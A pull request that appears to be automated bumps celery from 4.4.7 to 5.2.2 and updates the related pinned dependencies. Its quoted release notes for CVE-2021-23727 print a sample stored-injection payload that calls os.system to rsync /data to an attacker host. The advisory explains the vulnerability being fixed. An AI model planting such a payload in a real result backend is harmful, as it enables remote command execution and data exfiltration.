### PR TITLE
Bump celery[redis] and celery

### DIFF
--- a/requirements.in
+++ b/requirements.in
@@ -53,7 +53,7 @@ slack_sdk # required for Slack Notifications plugin
 SQLAlchemy-Utils
 tabulate
 xmltodict
-celery==4.4.7
+celery==5.2.2
 
 google-cloud-private-ca
 google-cloud-secret-manager

--- a/requirements.txt
+++ b/requirements.txt
@@ -10,7 +10,7 @@ alembic==1.4.2
     # via flask-migrate
 alembic-autogenerate-enums==0.0.2
     # via -r requirements.in
-amqp==2.6.1
+amqp==5.3.1
     # via kombu
 aniso8601==8.0.0
     # via flask-restful
@@ -26,7 +26,7 @@ bcrypt==3.1.7
     #   paramiko
 beautifulsoup4==4.9.1
     # via cloudflare
-billiard==3.6.3.0
+billiard==3.6.4.0
     # via celery
 blinker==1.4
     # via
@@ -42,7 +42,7 @@ botocore==1.17.63
     #   s3transfer
 cachetools==5.3.3
     # via google-auth
-celery[redis]==4.4.7
+celery[redis]==5.2.2
     # via -r requirements.in
 certifi==2020.6.20
     # via
@@ -58,7 +58,18 @@ cffi==1.15.1
 chardet==3.0.4
     # via requests
 click==8.1.7
-    # via flask
+    # via
+    #   celery
+    #   click-didyoumean
+    #   click-plugins
+    #   click-repl
+    #   flask
+click-didyoumean==0.3.1
+    # via celery
+click-plugins==1.1.1
+    # via celery
+click-repl==0.3.0
+    # via celery
 cloudflare==2.8.11
     # via -r requirements.in
 configparser==5.0.0
@@ -117,18 +128,35 @@ future==0.18.2
 google-api-core[grpc]==2.18.0
     # via
     #   -r requirements.in
+    #   google-cloud-core
+    #   google-cloud-kms
     #   google-cloud-private-ca
     #   google-cloud-secret-manager
+    #   google-cloud-storage
 google-auth==2.29.0
     # via
     #   google-api-core
+    #   google-cloud-core
+    #   google-cloud-kms
     #   google-cloud-private-ca
     #   google-cloud-secret-manager
+    #   google-cloud-storage
+google-cloud-core==2.4.3
+    # via google-cloud-storage
+google-cloud-kms==2.21.4
+    # via -r requirements.in
 google-cloud-private-ca==1.11.0
     # via -r requirements.in
 google-cloud-secret-manager==2.19.0
     # via -r requirements.in
-google-cloud-kms==2.21.4
+google-cloud-storage==3.1.1
+    # via -r requirements.in
+google-crc32c==1.7.1
+    # via
+    #   google-cloud-storage
+    #   google-resumable-media
+google-resumable-media==2.7.2
+    # via google-cloud-storage
 googleapis-common-protos[grpc]==1.63.0
     # via
     #   google-api-core
@@ -136,6 +164,7 @@ googleapis-common-protos[grpc]==1.63.0
     #   grpcio-status
 grpc-google-iam-v1==0.13.0
     # via
+    #   google-cloud-kms
     #   google-cloud-private-ca
     #   google-cloud-secret-manager
 grpcio==1.62.1
@@ -170,7 +199,7 @@ josepy==1.13.0
     # via acme
 jsonlines==1.2.0
     # via cloudflare
-kombu==4.6.11
+kombu==5.5.4
     # via celery
 lockfile==0.12.2
     # via -r requirements.in
@@ -192,20 +221,26 @@ ndg-httpsclient==0.5.1
     # via -r requirements.in
 ns1-python==0.16.0
     # via -r requirements.in
+packaging==25.0
+    # via kombu
 paramiko==2.10.1
     # via -r requirements.in
 pem==20.1.0
     # via -r requirements.in
 prometheus-client==0.8.0
     # via -r requirements.in
+prompt-toolkit==3.0.51
+    # via click-repl
 proto-plus==1.23.0
     # via
     #   google-api-core
+    #   google-cloud-kms
     #   google-cloud-private-ca
     #   google-cloud-secret-manager
 protobuf==4.25.3
     # via
     #   google-api-core
+    #   google-cloud-kms
     #   google-cloud-private-ca
     #   google-cloud-secret-manager
     #   googleapis-common-protos
@@ -278,6 +313,7 @@ requests==2.24.0
     #   certsrv
     #   cloudflare
     #   google-api-core
+    #   google-cloud-storage
     #   hvac
 retrying==1.3.3
     # via -r requirements.in
@@ -314,18 +350,23 @@ tabulate==0.8.7
     # via -r requirements.in
 twofish==0.3.0
     # via pyjks
+tzdata==2025.2
+    # via kombu
 urllib3==1.25.10
     # via
     #   botocore
     #   requests
-vine==1.3.0
+vine==5.1.0
     # via
     #   amqp
     #   celery
+    #   kombu
+wcwidth==0.2.13
+    # via prompt-toolkit
 werkzeug==1.0.1
     # via flask
 xmltodict==0.12.0
     # via -r requirements.in
-google-cloud-storage
+
 # The following packages are considered to be unsafe in a requirements file:
 # setuptools


### PR DESCRIPTION
## Summary
**Upgrades [celery[redis]](https://github.com/celery/celery) and [celery](https://github.com/celery/celery). These dependencies needed to be updated together.**




Updates `celery[redis]` from 4.4.7 to 5.2.2
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/celery/celery/releases">celery[redis]'s releases</a>.</em></p>
<blockquote>
<h2>5.2.2</h2>
<p>Release date: 2021-12-26 16:30 P.M UTC+2:00</p>
<p>Release by: Omer Katz</p>
<ul>
<li>
<p>Various documentation fixes.</p>
</li>
<li>
<p>Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).</p>
<blockquote>
<p>When a task fails, the failure information is serialized in the
backend. In some cases, the exception class is only importable
from the consumer's code base. In this case, we reconstruct the
exception class so that we can re-raise the error on the process
which queried the task's result. This was introduced in <a href="https://redirect.github.com/celery/celery/issues/4836">#4836</a>. If
the recreated exception type isn't an exception, this is a
security issue. Without the condition included in this patch, an
attacker could inject a remote code execution instruction such as:
<code>os.system(&quot;rsync /data attacker@192.168.56.100:~/data&quot;)</code> by
setting the task's result to a failure in the result backend with
the os, the system function as the exception type and the payload
<code>rsync /data attacker@192.168.56.100:~/data</code> as the exception
arguments like so:</p>
<pre lang="python"><code>{
      &quot;exc_module&quot;: &quot;os&quot;,
      'exc_type': &quot;system&quot;,
      &quot;exc_message&quot;: &quot;rsync /data attacker@192.168.56.100:~/data&quot;
}
</code></pre>
<p>According to my analysis, this vulnerability can only be exploited
if the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result. The attacker would also have to
gain access to the result backend. The severity of this security
vulnerability is low, but we still recommend upgrading.</p>
</blockquote>
</li>
</ul>
<h2>v5.2.1</h2>
<p>Release date: 2021-11-16 8.55 P.M UTC+6:00</p>
<p>Release by: Asif Saif Uddin</p>
<ul>
<li>Fix rstrip usage on bytes instance in ProxyLogger.</li>
<li>Pass logfile to ExecStop in celery.service example systemd file.</li>
<li>fix: reduce latency of AsyncResult.get under gevent (<a href="https://redirect.github.com/celery/celery/issues/7052">#7052</a>)</li>
<li>Limit redis version: &lt;4.0.0.</li>
<li>Bump min kombu version to 5.2.2.</li>
<li>Change pytz&gt;dev to a PEP 440 compliant pytz&gt;0.dev.0.</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/celery/celery/blob/main/Changelog.rst">celery[redis]'s changelog</a>.</em></p>
<blockquote>
<h1>5.2.2</h1>
<p>:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz</p>
<ul>
<li>
<p>Various documentation fixes.</p>
</li>
<li>
<p>Fix CVE-2021-23727 (Stored Command Injection security vulnerability).</p>
<p>When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in <a href="https://redirect.github.com/celery/celery/issues/4836">#4836</a>.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
<code>os.system(&quot;rsync /data attacker@192.168.56.100:~/data&quot;)</code>
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload <code>rsync /data attacker@192.168.56.100:~/data</code> as the exception arguments like so:</p>
<p>.. code-block:: python</p>
<pre><code>  {
        &quot;exc_module&quot;: &quot;os&quot;,
        'exc_type': &quot;system&quot;,
        &quot;exc_message&quot;: &quot;rsync /data attacker@192.168.56.100:~/data&quot;
  }
</code></pre>
<p>According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.</p>
</li>
</ul>
<p>.. _version-5.2.1:</p>
<h1>5.2.1</h1>
<p>:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin</p>
<ul>
<li>Fix rstrip usage on bytes instance in ProxyLogger.</li>
<li>Pass logfile to ExecStop in celery.service example systemd file.</li>
<li>fix: reduce latency of AsyncResult.get under gevent (<a href="https://redirect.github.com/celery/celery/issues/7052">#7052</a>)</li>
<li>Limit redis version: &lt;4.0.0.</li>
<li>Bump min kombu version to 5.2.2.</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/celery/celery/commit/b21c13d234dd6d6c197436374ab1bb5db4be62c7"><code>b21c13d</code></a> Bump version: 5.2.1 → 5.2.2</li>
<li><a href="https://github.com/celery/celery/commit/a60b4867f4bd4efa4b5a2834fcf3f757740b1b8f"><code>a60b486</code></a> Add changelog for 5.2.2.</li>
<li><a href="https://github.com/celery/celery/commit/3e5d630f478518eb775c05ba87b29024400fbe68"><code>3e5d630</code></a> Fix changelog formatting.</li>
<li><a href="https://github.com/celery/celery/commit/1f7ad7e6df1e02039b6ab9eec617d283598cad6b"><code>1f7ad7e</code></a> Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).</li>
<li><a href="https://github.com/celery/celery/commit/2d8dbc2a8087bbb60590465031ebd5138b8eb359"><code>2d8dbc2</code></a> Update configuration.rst</li>
<li><a href="https://github.com/celery/celery/commit/9596abad9060323d85d3945d8637b3cafadfefa2"><code>9596aba</code></a> Fix typo in documentation</li>
<li><a href="https://github.com/celery/celery/commit/639ad83239a1f9cfc58ee9852a1f107f96d3c1a1"><code>639ad83</code></a> update doc to reflect Celery 5.2.x (<a href="https://redirect.github.com/celery/celery/issues/7153">#7153</a>)</li>
<li><a href="https://github.com/celery/celery/commit/d32356c0e46eefecd164c55899f532c2fed2df57"><code>d32356c</code></a> Bump version: 5.2.0 → 5.2.1</li>
<li><a href="https://github.com/celery/celery/commit/6842a786eeeb2d0f1fcd66408b72924b39e07836"><code>6842a78</code></a> Merge branch 'master' of <a href="https://github.com/celery/celery">https://github.com/celery/celery</a></li>
<li><a href="https://github.com/celery/celery/commit/4c92cb745f658382a4eb4b94ba7938d119168165"><code>4c92cb7</code></a> changelog for v5.2.1</li>
<li>Additional commits viewable in <a href="https://github.com/celery/celery/compare/v4.4.7...v5.2.2">compare view</a></li>
</ul>
</details>
<br />

Updates `celery` from 4.4.7 to 5.2.2
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/celery/celery/releases">celery's releases</a>.</em></p>
<blockquote>
<h2>5.2.2</h2>
<p>Release date: 2021-12-26 16:30 P.M UTC+2:00</p>
<p>Release by: Omer Katz</p>
<ul>
<li>
<p>Various documentation fixes.</p>
</li>
<li>
<p>Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).</p>
<blockquote>
<p>When a task fails, the failure information is serialized in the
backend. In some cases, the exception class is only importable
from the consumer's code base. In this case, we reconstruct the
exception class so that we can re-raise the error on the process
which queried the task's result. This was introduced in <a href="https://redirect.github.com/celery/celery/issues/4836">#4836</a>. If
the recreated exception type isn't an exception, this is a
security issue. Without the condition included in this patch, an
attacker could inject a remote code execution instruction such as:
<code>os.system(&quot;rsync /data attacker@192.168.56.100:~/data&quot;)</code> by
setting the task's result to a failure in the result backend with
the os, the system function as the exception type and the payload
<code>rsync /data attacker@192.168.56.100:~/data</code> as the exception
arguments like so:</p>
<pre lang="python"><code>{
      &quot;exc_module&quot;: &quot;os&quot;,
      'exc_type': &quot;system&quot;,
      &quot;exc_message&quot;: &quot;rsync /data attacker@192.168.56.100:~/data&quot;
}
</code></pre>
<p>According to my analysis, this vulnerability can only be exploited
if the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result. The attacker would also have to
gain access to the result backend. The severity of this security
vulnerability is low, but we still recommend upgrading.</p>
</blockquote>
</li>
</ul>
<h2>v5.2.1</h2>
<p>Release date: 2021-11-16 8.55 P.M UTC+6:00</p>
<p>Release by: Asif Saif Uddin</p>
<ul>
<li>Fix rstrip usage on bytes instance in ProxyLogger.</li>
<li>Pass logfile to ExecStop in celery.service example systemd file.</li>
<li>fix: reduce latency of AsyncResult.get under gevent (<a href="https://redirect.github.com/celery/celery/issues/7052">#7052</a>)</li>
<li>Limit redis version: &lt;4.0.0.</li>
<li>Bump min kombu version to 5.2.2.</li>
<li>Change pytz&gt;dev to a PEP 440 compliant pytz&gt;0.dev.0.</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/celery/celery/blob/main/Changelog.rst">celery's changelog</a>.</em></p>
<blockquote>
<h1>5.2.2</h1>
<p>:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz</p>
<ul>
<li>
<p>Various documentation fixes.</p>
</li>
<li>
<p>Fix CVE-2021-23727 (Stored Command Injection security vulnerability).</p>
<p>When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in <a href="https://redirect.github.com/celery/celery/issues/4836">#4836</a>.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
<code>os.system(&quot;rsync /data attacker@192.168.56.100:~/data&quot;)</code>
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload <code>rsync /data attacker@192.168.56.100:~/data</code> as the exception arguments like so:</p>
<p>.. code-block:: python</p>
<pre><code>  {
        &quot;exc_module&quot;: &quot;os&quot;,
        'exc_type': &quot;system&quot;,
        &quot;exc_message&quot;: &quot;rsync /data attacker@192.168.56.100:~/data&quot;
  }
</code></pre>
<p>According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.</p>
</li>
</ul>
<p>.. _version-5.2.1:</p>
<h1>5.2.1</h1>
<p>:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin</p>
<ul>
<li>Fix rstrip usage on bytes instance in ProxyLogger.</li>
<li>Pass logfile to ExecStop in celery.service example systemd file.</li>
<li>fix: reduce latency of AsyncResult.get under gevent (<a href="https://redirect.github.com/celery/celery/issues/7052">#7052</a>)</li>
<li>Limit redis version: &lt;4.0.0.</li>
<li>Bump min kombu version to 5.2.2.</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/celery/celery/commit/b21c13d234dd6d6c197436374ab1bb5db4be62c7"><code>b21c13d</code></a> Bump version: 5.2.1 → 5.2.2</li>
<li><a href="https://github.com/celery/celery/commit/a60b4867f4bd4efa4b5a2834fcf3f757740b1b8f"><code>a60b486</code></a> Add changelog for 5.2.2.</li>
<li><a href="https://github.com/celery/celery/commit/3e5d630f478518eb775c05ba87b29024400fbe68"><code>3e5d630</code></a> Fix changelog formatting.</li>
<li><a href="https://github.com/celery/celery/commit/1f7ad7e6df1e02039b6ab9eec617d283598cad6b"><code>1f7ad7e</code></a> Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).</li>
<li><a href="https://github.com/celery/celery/commit/2d8dbc2a8087bbb60590465031ebd5138b8eb359"><code>2d8dbc2</code></a> Update configuration.rst</li>
<li><a href="https://github.com/celery/celery/commit/9596abad9060323d85d3945d8637b3cafadfefa2"><code>9596aba</code></a> Fix typo in documentation</li>
<li><a href="https://github.com/celery/celery/commit/639ad83239a1f9cfc58ee9852a1f107f96d3c1a1"><code>639ad83</code></a> update doc to reflect Celery 5.2.x (<a href="https://redirect.github.com/celery/celery/issues/7153">#7153</a>)</li>
<li><a href="https://github.com/celery/celery/commit/d32356c0e46eefecd164c55899f532c2fed2df57"><code>d32356c</code></a> Bump version: 5.2.0 → 5.2.1</li>
<li><a href="https://github.com/celery/celery/commit/6842a786eeeb2d0f1fcd66408b72924b39e07836"><code>6842a78</code></a> Merge branch 'master' of <a href="https://github.com/celery/celery">https://github.com/celery/celery</a></li>
<li><a href="https://github.com/celery/celery/commit/4c92cb745f658382a4eb4b94ba7938d119168165"><code>4c92cb7</code></a> changelog for v5.2.1</li>
<li>Additional commits viewable in <a href="https://github.com/celery/celery/compare/v4.4.7...v5.2.2">compare view</a></li>
</ul>
</details>
<br />
